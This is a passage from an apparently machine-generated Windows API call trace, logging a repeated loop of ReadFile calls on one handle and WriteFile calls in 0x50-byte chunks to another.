lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] GetFileType (hFile=0x50) returned 0x1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] GetFileType (hFile=0x50) returned 0x1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] GetFileType (hFile=0x50) returned 0x1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.908] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.908] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] GetFileType (hFile=0x50) returned 0x1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] GetFileType (hFile=0x50) returned 0x1 [0205.908] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.908] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] GetFileType (hFile=0x50) returned 0x1 [0205.909] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.909] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.910] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.910] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] GetFileType (hFile=0x50) returned 0x1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] GetFileType (hFile=0x50) returned 0x1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] GetFileType (hFile=0x50) returned 0x1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] GetFileType (hFile=0x50) returned 0x1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] GetFileType (hFile=0x50) returned 0x1 [0205.910] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.910] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] GetFileType (hFile=0x50) returned 0x1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] GetFileType (hFile=0x50) returned 0x1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] GetFileType (hFile=0x50) returned 0x1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.911] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.911] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] GetFileType (hFile=0x50) returned 0x1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] GetFileType (hFile=0x50) returned 0x1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.911] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.911] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] GetFileType (hFile=0x50) returned 0x1 [0205.912] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.912] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.913] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.913] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.913] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.913] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] GetFileType (hFile=0x50) returned 0x1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] GetFileType (hFile=0x50) returned 0x1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] GetFileType (hFile=0x50) returned 0x1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] GetFileType (hFile=0x50) returned 0x1 [0205.913] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.913] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.914] GetFileType (hFile=0x50) returned 0x1 [0205.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.914] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.914] GetFileType (hFile=0x50) returned 0x1 [0205.914] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.914] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] GetFileType (hFile=0x50) returned 0x1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] GetFileType (hFile=0x50) returned 0x1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.915] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.915] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] GetFileType (hFile=0x50) returned 0x1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] GetFileType (hFile=0x50) returned 0x1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] GetFileType (hFile=0x50) returned 0x1 [0205.915] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.915] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] GetFileType (hFile=0x50) returned 0x1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] GetFileType (hFile=0x50) returned 0x1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] GetFileType (hFile=0x50) returned 0x1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] GetFileType (hFile=0x50) returned 0x1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] GetFileType (hFile=0x50) returned 0x1 [0205.916] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.916] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.916] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.916] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.917] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.917] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] GetFileType (hFile=0x50) returned 0x1 [0205.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.917] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] GetFileType (hFile=0x50) returned 0x1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] GetFileType (hFile=0x50) returned 0x1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.918] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12de6c | out: lpNewFilePointer=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.918] ReadFile (in: hFile=0x58, lpBuffer=0x12ec9c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12de8c, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesRead=0x12de8c*=0x200, lpOverlapped=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] GetFileType (hFile=0x50) returned 0x1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] GetFileType (hFile=0x50) returned 0x1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] WriteFile (in: hFile=0x50, lpBuffer=0x12ec9c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ec9c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.918] GetFileType (hFile=0x50) returned 0x1 [0205.918] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12ecec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ecec*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] GetFileType (hFile=0x50) returned 0x1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12ed3c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed3c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] GetFileType (hFile=0x50) returned 0x1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12ed8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ed8c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] GetFileType (hFile=0x50) returned 0x1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12eddc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12eddc*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] GetFileType (hFile=0x50) returned 0x1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12ee2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee2c*, lpNumberOfBytesWritten=0x12de80*=0x50, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] GetFileType (hFile=0x50) returned 0x1 [0205.919] _get_osfhandle (_FileHandle=1) returned 0x50 [0205.919] WriteFile (in: hFile=0x50, lpBuffer=0x12ee7c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12de80, lpOverlapped=0x0 | out: lpBuffer=0x12ee7c*, lpNumberOfBytesWritten=0x12de80*=0x20, lpOverlapped=0x0) returned 1 [0205.919] _get_osfhandle (_FileHandle=4) returned 0x58 [0205.920] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 